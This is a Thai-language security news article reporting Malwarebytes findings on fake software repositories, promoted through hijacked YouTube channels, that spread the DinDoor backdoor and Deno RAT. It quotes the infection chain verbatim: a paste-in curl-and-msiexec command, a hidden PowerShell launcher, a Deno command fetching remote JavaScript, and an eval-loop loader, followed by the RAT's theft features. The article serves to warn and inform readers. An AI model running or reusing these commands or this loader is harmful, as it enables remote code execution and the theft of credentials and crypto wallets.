ระวังซอฟต์แวร์ปลอมบน GitHub กับ SourceForge
ระวังซอฟต์แวร์ปลอมบน GitHub กับ SourceForge โหลดแล้วอาจติดมัลแวร์ Deno RAT ได้
จากรายงานโดยเว็บไซต์อย่างเป็นทางการของผู้พัฒนาเครื่องมือต่อต้านมัลแวร์ชื่อดัง Malwarebytes ได้กล่าวถึงการตรวจพบการใช้แพลตฟอร์ม GitHub และ SourceForge เป็นตัวกลางในการแพร่กระจายมัลแวร์ประเภทเข้าควบคุมเครื่องของเหยื่อจากระยะไกล หรือ RAT (Remote Access Trojan) ที่มีชื่อว่า Deno RAT และมัลแวร์ประเภทเปิดประตูหลังของระบบ หรือ Backdoor ชื่อว่า DinDoor ซึ่งก็เป็นสายพันธุ์ย่อยในตระกูล Deno เช่นเดียวกัน เนื่องจากมีการใช้งาน Deno JavaScript ในช่วงของการ Runtime เพื่อช่วยในการหลบเลี่ยงการถูกตรวจจับ
สำหรับในแคมเปญนี้นั้นก็เรียกได้ว่าเรียบง่าย เนื่องจากแฮกเกอร์จะใช้วิธีการหลอกลวงในรูปแบบ Phishing เข้าแฮกเพื่อยึดช่อง Youtube คนอื่นมาใช้ในการลงคลิปหลอกลวงว่ามีซอฟต์แวร์ชื่อดังให้ใช้งานฟรีพร้อมวิธีการ ซึ่งคลิปเหล่านี้มีผู้รับชมรวมกันทั้งหมดแล้วร่วม 5 หมื่นรายเลยทีเดียว โดยซอฟต์แวร์ที่นำมาใช้แอบอ้างนั้นมักจะเป็นซอฟต์แวร์ด้านปัญญาประดิษฐ์ หรือ AI (Artificial Intelligence), ซอฟต์แวร์เถื่อนที่ถูกแคร็ก (Cracked) แล้ว, และเครื่องมืออย่างไม่เป็นทางการ (Unofficial Tools) อื่น ๆ แล้วจึงทำการโพสต์ข้อความโปรโมตพร้อมลิงก์ที่กล่าวอ้างว่าเป็นซอฟต์แวร์ฟรีนั้นจะสามารถนำพาเหยื่อไปยังคลังดิจิทัล (Repo หรือ Repository) บนแพลตฟอร์ม GitHub, SourceForge, และแพลตฟอร์มอื่น ๆ ที่คล้ายกัน ซึ่งบัญชีที่แฮกเกอร์ใช้ในการสร้าง Repo นั้นจะตกแต่งหน้าตาจนคล้ายคลึงกับว่าเป็นผู้พัฒนาของแท้ทำให้เหยื่อหลายรายไม่เอะใจแล้วหลงเชื่อ
หลังจากที่เหยื่อเข้าไปยัง Repo ปลายทางแล้วก็จะพบโค้ดคำสั่งที่อ้างว่าให้ทำการคัดลอกไปวางบนเครื่องมือสำหรับรันเพื่อทำการติดตั้งซอฟต์แวร์ ซึ่งถ้าเป็นผู้ใช้งานระบบปฏิบัติการ Windows ก็จะให้ทำการเปิดฟีเจอร์ Cmd แล้ววางโค้ดคำสั่งดังกล่าวเพื่อรัน แต่ถ้าเป็นผู้ใช้งาน macOS ก็จะให้ทำการรันผ่านทางแอปพลิเคชัน Terminal ซึ่งวิธีการดังกล่าวนั้นคล้ายคลึงกับการใช้หน้าบอกข้อผิดพลาด หรือ หน้ายืนยันตัวตนหลอกลวงเพื่อให้คัดลอกโค้ดไปรันโดยอ้างว่าเป็นการแก้ไขปัญหา ซึ่งเป็นวิธีการที่เรียกว่าการทำ ClickFix อย่างยิ่ง
ในด้านการทำงานของการฝังตัวของมัลแวร์นั้น ทางทีมวิจัยได้ยกตัวอย่างการทำงานบนเวอร์ชัน Windows มาว่าจะเริ่มจากการหลอกให้เหยื่อทำการคัดลอกคำสั่งนี้ไปรันบน cmd
curl -Lo %temp%s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%s.msi
ซึ่งตัวคำสั่งนั้นจะทำการดาวน์โหลดไฟล์ติดตั้งมัลแวร์ในสกุล MSI ลงมาเพื่อทำการรันอย่างอัตโนมัติผ่านทาง msiexec โดยการรันนั้นจะนำพาไปสู่การปล่อยไฟล์ .cmd และไฟล์สคริปท์ PowerShell ลงไปยังโฟลเดอร์ InstallationFolder ตามมาด้วยรันไฟล์ cmd ขึ้นมาเพื่อใช้งานสคริปท์ PowerShell ด้วยคำสั่ง
@set "SCRIPTDIR=%~dp0" @powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden"
โดยตัวสคริปท์ PowerShell นั้นจะจัดการในขั้นตอนการติดตั้งมัลแวร์ดังนี้
ติดตั้งตัวจัดการแพ็คเกจ (Package Manager) ชื่อว่า Scoop
ใช้งาน Scoop เพื่อจัดการติดตั้ง WinGet ซึ่งเป็นซอฟต์แวร์ประเภท Windows Package Manager ถ้าตรวจไม่พบ WinGet บนระบบ
จากนั้นใช้งาน WinGet เพื่อติดตั้ง Deno JavaScript ด้วยการใช้งานคำสั่งด้านล่าง
"C:Usersadminscoopappswingetcurrentwinget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent
ถัดจากนั้นก็จะเป็นการใช้งาน Deno เพื่อติดตั้งมัลแวร์ DinDoor ผ่านทางคำ
"C:UsersadminAppDataLocalMicrosoftWinGetPackagesDenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwedeno.exe" run -A http://{C2}/{random_path}.js
โดยโต้ดที่ถูกส่งกลับมา (Returned Code) ภายใต้ชื่อ “launcher-1” จะเป็นฟังก์ชัน eval-loop ขนาดเล็กที่ใช้ในการดาวน์โหลดขั้นตอนถัดไป ภายใต้ชื่อ “launcher-2” เพื่อติดตั้งมัลแวร์ DinDoor ซึ่งลักษณะของตัว Returned Code นั้นเป็นดังนี้
var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))}
ตัวมัลแวร์ DinDoor นั้นจะใช้ในการสร้างความคงทนบนระบบ (Persistence) ด้วยการใช้งานคำสั่งด้านล่างเพื่อสร้างกุญแจ Run (Run Key) ให้กับ “launcher-1” เพื่อรับประกันว่าตัวมัลแวร์จะสามารถกลับมารันใหม่ได้ตลอดเวลา
conhost.exe --headless "" -A "%APPDATA%.js
และติดต่อกับเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) เพื่อดาวน์โหลดไฟล์มัลแวร์ (Payload) ของมัลแวร์ Deno RAT ลงมาติดตั้ง โดยตัวมัลแวร์ Deno RAT นั้นมีความสามารถในการรองรับคำสั่งจากเซิร์ฟเวอร์หลากหลายอย่าง เช่น exec, exec-ps, exec-sc, sysinfo, screenshot, และ stealer เป็นต้น นอกจากนั้นยังมีฟังก์ชันในการจัดการกับเครื่องของเหยื่อมากมาย เช่น
เก็บข้อมูลต่าง ๆ จากเครื่องของเหยื่อ
ควบคุมเครื่องของเหยื่อด้วยการใช้งานเครื่องมือ VNC (Virtual Network Computing) ผ่านทางช่องทาง WebSocket
ขโมยข้อมูลจากกระเป๋าเงินคริปโตเคอร์เรนซี (Crypto Wallet) ในรูปแบบส่วนเสริมของเว็บเบราว์เซอร์ (Extension) กว่า 50 ตัว และในโฟลเดอร์ของกระเป๋าแบบซอฟต์แวร์กว่า 10 ตัว โดยครอบคลุม Atomic Wallet, Exodus, Electrum, และ ByteCoin เป็นต้น
ขโมยข้อมูลจากเว็บเบราว์เซอร์จำนวนมาก เช่น Chrome, Chromium, Brave, Edge, Avast Browser, Edge, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, และ Chromodo
ขโมยและดัดแปลงข้อมูลบน Clipboard
ลักลอบส่งออกข้อมูล (Exfiltration) ของแอปพลิเคชัน Telegram, Discord, และ Lightcord
ลักลอบบันทึกหน้าจอ (Screenshot)
รันหรือลบ Process ได้อย่างตามใจชอบ
รันคำสั่งแบบ PowerShell
สร้าง SOCKS5 Proxy Tunnels ผ่านทาง WebSocket
รัน Payload เพื่อติดตั้งมัลแวร์เพิ่มเติม
